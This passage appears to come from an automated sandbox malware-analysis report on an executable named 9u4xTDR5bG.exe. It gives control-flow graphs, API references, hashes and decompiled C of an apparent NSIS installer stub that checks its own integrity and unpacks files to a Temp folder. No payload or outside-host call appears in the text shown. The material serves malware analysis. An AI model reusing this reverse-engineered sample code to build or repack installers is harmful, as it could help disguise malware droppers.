                                                  • RegisterClassW.USER32 ref: 00403E56
                                                  • DialogBoxParamW.USER32 ref: 00403E75
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-125959014
                                                  • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                  • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                  • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                  • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 400 40325a-403262 call 403019 393->400 401 40313a-403141 393->401 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 422 40321f-403225 397->422 398->395 426 403264-403275 398->426 400->395 404 403143-403157 call 405fe8 401->404 405 4031bd-4031c1 401->405 413 4031cb-4031d1 404->413 424 403159-403160 404->424 412 4031c3-4031ca call 403019 405->412 405->413 412->413 415 4031e0-4031e8 413->415 416 4031d3-4031dd call 4069f7 413->416 415->390 425 4031ee 415->425 416->415 422->395 422->398 424->413 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->413 431 40316b-403172 428->431 429->430 432 403283-403289 430->432 431->413 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fe8 432->434 433->413 435 40317d-40319d 433->435 437 4032ab 434->437 435->395 438 4031a3-4031a7 435->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->413 441 4031b9-4031bb 440->441 441->413
                                                  C-Code - Quality: 78%
                                                  			E0040307D(void* __eflags, signed int _a4) {
                                                  				DWORD* _v8;
                                                  				DWORD* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				signed int _v44;
                                                  				long _t43;
                                                  				long _t50;
                                                  				void* _t53;
                                                  				void* _t57;
                                                  				intOrPtr* _t59;
                                                  				long _t60;
                                                  				long _t70;
                                                  				signed int _t77;
                                                  				intOrPtr _t80;
                                                  				long _t82;
                                                  				void* _t85;
                                                  				signed int _t87;
                                                  				void* _t89;
                                                  				long _t90;
                                                  				long _t93;
                                                  				void* _t94;
                                                  
                                                  				_t82 = 0;
                                                  				_v12 = 0;
                                                  				_v8 = 0;
                                                  				_t43 = GetTickCount();
                                                  				_t91 = L"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe";
                                                  				 *0x434f0c = _t43 + 0x3e8;
                                                  				GetModuleFileNameW(0, L"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe", 0x400);
                                                  				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                  				_v16 = _t89;
                                                  				 *0x40a018 = _t89;
                                                  				if(_t89 == 0xffffffff) {
                                                  					return L"Error launching installer";
                                                  				}
                                                  				E0040653D(0x441800, _t91);
                                                  				E0040653D(0x444000, E00405E58(0x441800));
                                                  				_t50 = GetFileSize(_t89, 0);
                                                  				 *0x42aa24 = _t50;
                                                  				_t93 = _t50;
                                                  				if(_t50 <= 0) {
                                                  					L24:
                                                  					E00403019(1);
                                                  					if( *0x434f14 == _t82) {
                                                  						goto L29;
                                                  					}
                                                  					if(_v8 == _t82) {
                                                  						L28:
                                                  						_t34 =  &_v24; // 0x40387d
                                                  						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                  						_t94 = _t53;
                                                  						E004034E5( *0x434f14 + 0x1c);
                                                  						_t35 =  &_v24; // 0x40387d
                                                  						_push( *_t35);
                                                  						_push(_t94);
                                                  						_push(_t82);
                                                  						_push(0xffffffff); // executed
                                                  						_t57 = E004032B4(); // executed
                                                  						if(_t57 == _v24) {
                                                  							 *0x434f10 = _t94;
                                                  							 *0x434f18 =  *_t94;
                                                  							if((_v44 & 0x00000001) != 0) {
                                                  								 *0x434f1c =  *0x434f1c + 1;
                                                  							}
                                                  							_t40 = _t94 + 0x44; // 0x44
                                                  							_t59 = _t40;
                                                  							_t85 = 8;
                                                  							do {
                                                  								_t59 = _t59 - 8;
                                                  								 *_t59 =  *_t59 + _t94;
                                                  								_t85 = _t85 - 1;
                                                  							} while (_t85 != 0);
                                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                  							 *(_t94 + 0x3c) = _t60;
                                                  							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                  							return 0;
                                                  						}
                                                  						goto L29;
                                                  					}
                                                  					E004034E5( *0x41ea18);
                                                  					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                                                  						goto L29;
                                                  					} else {
                                                  						goto L28;
                                                  					}
                                                  				} else {
                                                  					do {
                                                  						_t90 = _t93;
                                                  						asm("sbb eax, eax");
                                                  						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                  						if(_t93 >= _t70) {
                                                  							_t90 = _t70;
                                                  						}
                                                  						if(E004034CF(0x416a18, _t90) == 0) {
                                                  							E00403019(1);
                                                  							L29:
                                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                  						}
                                                  						if( *0x434f14 != 0) {
                                                  							if((_a4 & 0x00000002) == 0) {
                                                  								E00403019(0);
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                  						_t77 = _v44;
                                                  						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                  							_a4 = _a4 | _t77;
                                                  							_t87 =  *0x41ea18; // 0x160cd
                                                  							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                  							_t80 = _v20;
                                                  							 *0x434f14 = _t87;
                                                  							if(_t80 > _t93) {
                                                  								goto L29;
                                                  							}
                                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                  								_v8 = _v8 + 1;
                                                  								_t93 = _t80 - 4;
                                                  								if(_t90 > _t93) {
                                                  									_t90 = _t93;
                                                  								}
                                                  								goto L20;
                                                  							} else {
                                                  								break;
                                                  							}
                                                  						}
                                                  						L20:
                                                  						if(_t93 <  *0x42aa24) {
                                                  							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                  						}
                                                  						 *0x41ea18 =  *0x41ea18 + _t90;
                                                  						_t93 = _t93 - _t90;
                                                  					} while (_t93 != 0);
                                                  					_t82 = 0;
                                                  					goto L24;
                                                  				}
                                                  			}





























                                                  0x00403085
                                                  0x00403088
                                                  0x0040308b
                                                  0x0040308e
                                                  0x00403094
                                                  0x004030a5
                                                  0x004030aa
                                                  0x004030bd
                                                  0x004030c2
                                                  0x004030c5
                                                  0x004030cb
                                                  0x00000000
                                                  0x004030cd
                                                  0x004030de
                                                  0x004030ef
                                                  0x004030f6
                                                  0x004030fe
                                                  0x00403103
                                                  0x00403105
                                                  0x004031f0
                                                  0x004031f2
                                                  0x004031fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00403203
                                                  0x00403227
                                                  0x00403227
                                                  0x0040322c
                                                  0x00403232
                                                  0x0040323d
                                                  0x00403242
                                                  0x00403242
                                                  0x00403245
                                                  0x00403246
                                                  0x00403247
                                                  0x00403249
                                                  0x00403251
                                                  0x00403268
                                                  0x00403270
                                                  0x00403275
                                                  0x00403277
                                                  0x00403277
                                                  0x0040327f
                                                  0x0040327f
                                                  0x00403282
                                                  0x00403283
                                                  0x00403283
                                                  0x00403286
                                                  0x00403288
                                                  0x00403288
                                                  0x00403292
                                                  0x00403298
                                                  0x004032a6
                                                  0x00000000
                                                  0x004032ab
                                                  0x00000000
                                                  0x00403251
                                                  0x0040320b
                                                  0x0040321d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040310b
                                                  0x00403110
                                                  0x00403115
                                                  0x00403119
                                                  0x00403120
                                                  0x00403127
                                                  0x00403129
                                                  0x00403129
                                                  0x00403134
                                                  0x0040325c
                                                  0x00403253
                                                  0x00000000
                                                  0x00403253
                                                  0x00403141
                                                  0x004031c1
                                                  0x004031c5
                                                  0x004031ca
                                                  0x00000000
                                                  0x004031c1
                                                  0x0040314a
                                                  0x0040314f
                                                  0x00403157
                                                  0x0040317d
                                                  0x00403183
                                                  0x0040318c
                                                  0x00403192
                                                  0x00403197
                                                  0x0040319d
                                                  0x00000000
                                                  0x00000000
                                                  0x004031a7
                                                  0x004031af
                                                  0x004031b2
                                                  0x004031b7
                                                  0x004031b9
                                                  0x004031b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004031a7
                                                  0x004031cb
                                                  0x004031d1
                                                  0x004031dd
                                                  0x004031dd
                                                  0x004031e0
                                                  0x004031e6
                                                  0x004031e6
                                                  0x004031ee
                                                  0x00000000
                                                  0x004031ee

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040308E
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\9u4xTDR5bG.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\9u4xTDR5bG.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                  • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\9u4xTDR5bG.exe,C:\Users\user\Desktop\9u4xTDR5bG.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                  • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\9u4xTDR5bG.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                  • API String ID: 2803837635-1375000799
                                                  • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                  • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                  • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                  • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 538 4034c2 526->538 527->526 532 403474-40347a 528->532 529->530 530->516 540 403388-403391 530->540 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 543 40348e-40349a call 4060df 536->543 538->524 542 403397-4033b7 call 406a65 540->542 547 403460-403462 542->547 548 4033bd-4033d0 GetTickCount 542->548 552 403464-403466 543->552 553 40349c-4034a6 543->553 547->518 550 4033d2-4033da 548->550 551 40341b-40341d 548->551 554 4033e2-403413 MulDiv wsprintfW call 40559f 550->554 555 4033dc-4033e0 550->555 556 403454-403458 551->556 557 40341f-403423 551->557 552->518 553->532 558 4034a8 553->558 563 403418 554->563 555->551 555->554 556->525 559 40345e 556->559 561 403425-40342c call 4060df 557->561 562 40343a-403445 557->562 558->524 559->524 566 403431-403433 561->566 565 403448-40344c 562->565 563->551 565->542 567 403452 565->567 566->552 568 403435-403438 566->568 567->524 568->565
                                                  C-Code - Quality: 95%
                                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				intOrPtr _v16;
                                                  				long _v20;
                                                  				intOrPtr _v24;
                                                  				short _v152;
                                                  				void* _t65;
                                                  				long _t70;
                                                  				intOrPtr _t75;
                                                  				long _t76;
                                                  				intOrPtr _t77;
                                                  				void* _t78;
                                                  				int _t88;
                                                  				intOrPtr _t92;
                                                  				intOrPtr _t95;
                                                  				long _t96;
                                                  				signed int _t97;
                                                  				int _t98;
                                                  				int _t99;
                                                  				intOrPtr _t100;
                                                  				void* _t101;
                                                  				void* _t102;
                                                  
                                                  				_t97 = _a16;
                                                  				_t92 = _a12;
                                                  				_v12 = _t97;
                                                  				if(_t92 == 0) {
                                                  					_v12 = 0x8000;
                                                  				}
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_v16 = _t92;
                                                  				if(_t92 == 0) {
                                                  					_v16 = 0x422a20;
                                                  				}
                                                  				_t62 = _a4;
                                                  				if(_a4 >= 0) {
                                                  					E004034E5( *0x434f58 + _t62);
                                                  				}
                                                  				if(E004034CF( &_a16, 4) == 0) {
                                                  					L41:
                                                  					_push(0xfffffffd);
                                                  					goto L42;
                                                  				} else {
                                                  					if((_a19 & 0x00000080) == 0) {
                                                  						if(_t92 != 0) {
                                                  							if(_a16 < _t97) {
                                                  								_t97 = _a16;
                                                  							}
                                                  							if(E004034CF(_t92, _t97) != 0) {
                                                  								_v8 = _t97;
                                                  								L44:
                                                  								return _v8;
                                                  							} else {
                                                  								goto L41;
                                                  							}
                                                  						}
                                                  						if(_a16 <= _t92) {
                                                  							goto L44;
                                                  						}
                                                  						_t88 = _v12;
                                                  						while(1) {
                                                  							_t98 = _a16;
                                                  							if(_a16 >= _t88) {
                                                  								_t98 = _t88;
                                                  							}
                                                  							if(E004034CF(0x41ea20, _t98) == 0) {
                                                  								goto L41;
                                                  							}
                                                  							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                  								L28:
                                                  								_push(0xfffffffe);
                                                  								L42:
                                                  								_pop(_t65);
                                                  								return _t65;
                                                  							}
                                                  							_v8 = _v8 + _t98;
                                                  							_a16 = _a16 - _t98;
                                                  							if(_a16 > 0) {
                                                  								continue;
                                                  							}
                                                  							goto L44;
                                                  						}
                                                  						goto L41;
                                                  					}
                                                  					_t70 = GetTickCount();
                                                  					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                  					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                  					_t14 =  &_a16;
                                                  					 *_t14 = _a16 & 0x7fffffff;
                                                  					_v20 = _t70;
                                                  					 *0x40ce68 = 8;
                                                  					 *0x416a10 = 0x40ea08;
                                                  					 *0x416a0c = 0x40ea08;
                                                  					 *0x416a08 = 0x416a08;
                                                  					_a4 = _a16;
                                                  					if( *_t14 <= 0) {
                                                  						goto L44;
                                                  					} else {
                                                  						goto L9;
                                                  					}
                                                  					while(1) {
                                                  						L9:
                                                  						_t99 = 0x4000;
                                                  						if(_a16 < 0x4000) {
                                                  							_t99 = _a16;
                                                  						}
                                                  						if(E004034CF(0x41ea20, _t99) == 0) {
                                                  							goto L41;
                                                  						}
                                                  						_a16 = _a16 - _t99;
                                                  						 *0x40ce58 = 0x41ea20;
                                                  						 *0x40ce5c = _t99;
                                                  						while(1) {
                                                  							_t95 = _v16;
                                                  							 *0x40ce60 = _t95;
                                                  							 *0x40ce64 = _v12;
                                                  							_t75 = E00406A65(0x40ce58);
                                                  							_v24 = _t75;
                                                  							if(_t75 < 0) {
                                                  								break;
                                                  							}
                                                  							_t100 =  *0x40ce60; // 0x425a20
                                                  							_t101 = _t100 - _t95;
                                                  							_t76 = GetTickCount();
                                                  							_t96 = _t76;
                                                  							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                  								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                  								_t102 = _t102 + 0xc;
                                                  								E0040559F(0,  &_v152); // executed
                                                  								_v20 = _t96;
                                                  							}
                                                  							if(_t101 == 0) {
                                                  								if(_a16 > 0) {
                                                  									goto L9;
                                                  								}
                                                  								goto L44;
                                                  							} else {
                                                  								if(_a12 != 0) {
                                                  									_t77 =  *0x40ce60; // 0x425a20
                                                  									_v8 = _v8 + _t101;
                                                  									_v12 = _v12 - _t101;
                                                  									_v16 = _t77;
                                                  									L23:
                                                  									if(_v24 != 1) {
                                                  										continue;
                                                  									}
                                                  									goto L44;
                                                  								}
                                                  								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                  								if(_t78 == 0) {
                                                  									goto L28;
                                                  								}
                                                  								_v8 = _v8 + _t101;
                                                  								goto L23;
                                                  							}
                                                  						}
                                                  						_push(0xfffffffc);
                                                  						goto L42;
                                                  					}
                                                  					goto L41;
                                                  				}
                                                  			}

























                                                  0x004032bf
                                                  0x004032c3
                                                  0x004032c6
                                                  0x004032cb
                                                  0x004032cd
                                                  0x004032cd
                                                  0x004032d4
                                                  0x004032d8
                                                  0x004032dd
                                                  0x004032df
                                                  0x004032df
                                                  0x004032e6
                                                  0x004032eb
                                                  0x004032f6
                                                  0x004032f6
                                                  0x00403308
                                                  0x004034bd
                                                  0x004034bd
                                                  0x00000000
                                                  0x0040330e
                                                  0x00403312
                                                  0x0040346a
                                                  0x004034ad
                                                  0x004034af
                                                  0x004034af
                                                  0x004034bb
                                                  0x004034c2
                                                  0x004034c5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004034bb
                                                  0x0040346f
                                                  0x00000000
                                                  0x00000000
                                                  0x00403471
                                                  0x00403474
                                                  0x00403477
                                                  0x0040347a
                                                  0x0040347c
                                                  0x0040347c
                                                  0x0040348c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040349a
                                                  0x00403464
                                                  0x00403464
                                                  0x004034bf
                                                  0x004034bf
                                                  0x00000000
                                                  0x004034bf
                                                  0x0040349c
                                                  0x0040349f
                                                  0x004034a6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004034a8
                                                  0x00000000
                                                  0x00403474
                                                  0x0040331e
                                                  0x00403320
                                                  0x00403327
                                                  0x0040332e
                                                  0x0040332e
                                                  0x00403335
                                                  0x0040333d
                                                  0x00403347
                                                  0x0040334c
                                                  0x00403354
                                                  0x0040335e
                                                  0x00403361
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403367
                                                  0x00403367
                                                  0x00403367
                                                  0x0040336f
                                                  0x00403371
                                                  0x00403371
                                                  0x00403382
                                                  0x00000000
                                                  0x00000000
                                                  0x00403388
                                                  0x0040338b
                                                  0x00403391
                                                  0x00403397
                                                  0x00403397
                                                  0x004033a2
                                                  0x004033a8
                                                  0x004033ad
                                                  0x004033b4
                                                  0x004033b7
                                                  0x00000000
                                                  0x00000000
                                                  0x004033bd
                                                  0x004033c3
                                                  0x004033c5
                                                  0x004033ce
                                                  0x004033d0
                                                  0x00403401
                                                  0x00403407
                                                  0x00403413
                                                  0x00403418
                                                  0x00403418
                                                  0x0040341d
                                                  0x00403458
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040341f
                                                  0x00403423
                                                  0x0040343a
                                                  0x0040343f
                                                  0x00403442
                                                  0x00403445
                                                  0x00403448
                                                  0x0040344c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403452
                                                  0x0040342c
                                                  0x00403433
                                                  0x00000000
                                                  0x00000000
                                                  0x00403435
                                                  0x00000000
                                                  0x00403435
                                                  0x0040341d
                                                  0x00403460
                                                  0x00000000
                                                  0x00403460
                                                  0x00000000
                                                  0x00403367

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                  • API String ID: 551687249-3683892814
                                                  • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                  • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                  • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                  • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 580 4017b5-4017b6 call 4067c4 574->580 575->580 584 4017bb-4017bf 580->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 593 4017dd-4017ef 585->593 594 4017cd-4017db CompareFileTime 585->594 587 4017f7-4017f8 call 406008 586->587 588 4017fd-401819 call 40602d 586->588 587->588 596 40181b-40181e 588->596 597 40188d-4018b6 call 40559f call 4032b4 588->597 593->586 594->593 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 609 4018b8-4018bc 597->609 610 4018be-4018ca SetFileTime 597->610 598->584 631 401864-401865 598->631 611 401882-401888 599->611 609->610 613 4018d0-4018db FindCloseChangeNotification 609->613 610->613 614 402c33 611->614 617 4018e1-4018e4 613->617 618 402c2a-402c2d 613->618 619 402c35-402c39 614->619 621 4018e6-4018f7 call 40657a lstrcatW 617->621 622 4018f9-4018fc call 40657a 617->622 618->614 628 401901-402398 621->628 622->628 632 40239d-4023a2 628->632 633 402398 call 405b9d 628->633 631->611 634 401867-401868 631->634 632->619 633->632 634->599
                                                  C-Code - Quality: 75%
                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                  				void* __esi;
                                                  				void* _t35;
                                                  				void* _t43;
                                                  				void* _t45;
                                                  				FILETIME* _t51;
                                                  				FILETIME* _t64;
                                                  				void* _t66;
                                                  				signed int _t72;
                                                  				FILETIME* _t73;
                                                  				FILETIME* _t77;
                                                  				signed int _t79;
                                                  				WCHAR* _t81;
                                                  				void* _t83;
                                                  				void* _t84;
                                                  				void* _t86;
                                                  
                                                  				_t77 = __ebx;
                                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                  				_t35 = E00405E83( *(_t86 - 8));
                                                  				_push( *(_t86 - 8));
                                                  				_t81 = L"Call";
                                                  				if(_t35 == 0) {
                                                  					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                  				} else {
                                                  					E0040653D();
                                                  				}
                                                  				E004067C4(_t81);
                                                  				while(1) {
                                                  					__eflags =  *(_t86 + 8) - 3;
                                                  					if( *(_t86 + 8) >= 3) {
                                                  						_t66 = E00406873(_t81);
                                                  						_t79 = 0;
                                                  						__eflags = _t66 - _t77;
                                                  						if(_t66 != _t77) {
                                                  							_t73 = _t66 + 0x14;
                                                  							__eflags = _t73;
                                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                  						__eflags = _t72;
                                                  						 *(_t86 + 8) = _t72;
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                  					if( *(_t86 + 8) == _t77) {
                                                  						E00406008(_t81);
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - 1;
                                                  					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                  					__eflags = _t43 - 0xffffffff;
                                                  					 *(_t86 - 0x38) = _t43;
                                                  					if(_t43 != 0xffffffff) {
                                                  						break;
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                  					if( *(_t86 + 8) != _t77) {
                                                  						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                  						__eflags =  *(_t86 + 8) - 2;
                                                  						if(__eflags == 0) {
                                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                  						}
                                                  						L31:
                                                  						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                  						__eflags =  *0x434f88;
                                                  						goto L32;
                                                  					} else {
                                                  						E0040653D("C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp", _t83);
                                                  						E0040653D(_t83, _t81);
